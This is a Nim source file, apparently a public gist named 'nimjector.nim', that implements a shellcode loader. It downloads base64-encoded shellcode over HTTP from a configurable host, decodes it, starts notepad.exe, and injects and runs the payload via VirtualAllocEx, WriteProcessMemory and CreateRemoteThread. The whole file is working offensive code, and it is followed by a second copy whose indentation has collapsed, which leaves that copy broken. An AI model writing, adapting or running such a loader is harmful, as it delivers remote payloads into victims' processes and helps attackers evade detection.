mttaggart/nimjector.nim

## nimjector.nim

# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils
import strformat
import httpclient


let scPort = 8000
let scAddr = "0.0.0.0"
let scFile = "note.txt"
let injectProcess = "notepad.exe"
let b64Iterations = 1

proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
    let tProcess = startProcess(injectProcess)
    tProcess.suspend()
    defer: tProcess.close()

    let pHandle = OpenProcess(
        PROCESS_ALL_ACCESS,
        false,
        cast[DWORD](tProcess.processID)
    )
    defer: CloseHandle(pHandle)

    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle,
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

    let tHandle = CreateRemoteThread(
        pHandle,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL,
        0,
        NULL
    )
    defer: CloseHandle(tHandle)


proc iterateDecode(sc: string, iterations: int): string =
  result = sc
  for i in 1..iterations:
    result = base64.decode(result)

  echo result
var client = newHttpClient()
var sc: string = client.get(fmt"http://{scAddr}:{scPort}/{scFile}").body

var sc_seq = iterateDecode(sc, b64Iterations)
    .split(",")
    .map(proc (h: string): string = strip(h))
    .map(parseHexInt)

# Change this based on shellcode size
var shellcode: array[890, byte]

# Shellcode size - 1
for s in 0..889:
    shellcode[s] = byte sc_seq[s]

when isMainModule:
    injectCreateRemoteThread(shellcode)

	# With special thanks to byt3bl33d3r for Offensive Nim!
	import winim/lean
	import osproc
	import base64
	import sequtils
	import strutils
	import strformat
	import httpclient


	let scPort = 8000
	let scAddr = "0.0.0.0"
	let scFile = "note.txt"
	let injectProcess = "notepad.exe"
	let b64Iterations = 1

	proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
	let tProcess = startProcess(injectProcess)
	tProcess.suspend()
	defer: tProcess.close()

	let pHandle = OpenProcess(
	PROCESS_ALL_ACCESS,
	false,
	cast[DWORD](tProcess.processID)
	)
	defer: CloseHandle(pHandle)

	let rPtr = VirtualAllocEx(
	pHandle,
	NULL,
	cast[SIZE_T](shellcode.len),
	MEM_COMMIT,
	PAGE_EXECUTE_READ_WRITE
	)

	var bytesWritten: SIZE_T
	let wSuccess = WriteProcessMemory(
	pHandle,
	rPtr,
	unsafeAddr shellcode,
	cast[SIZE_T](shellcode.len),
	addr bytesWritten
	)

	let tHandle = CreateRemoteThread(
	pHandle,
	NULL,
	0,
	cast[LPTHREAD_START_ROUTINE](rPtr),
	NULL,
	0,
	NULL
	)
	defer: CloseHandle(tHandle)


	proc iterateDecode(sc: string, iterations: int): string =
	result = sc
	for i in 1..iterations:
	result = base64.decode(result)

	echo result
	var client = newHttpClient()
	var sc: string = client.get(fmt"http://{scAddr}:{scPort}/{scFile}").body

	var sc_seq = iterateDecode(sc, b64Iterations)
	.split(",")
	.map(proc (h: string): string = strip(h))
	.map(parseHexInt)

	# Change this based on shellcode size
	var shellcode: array[890, byte]

	# Shellcode size - 1
	for s in 0..889:
	shellcode[s] = byte sc_seq[s]

	when isMainModule:
	injectCreateRemoteThread(shellcode)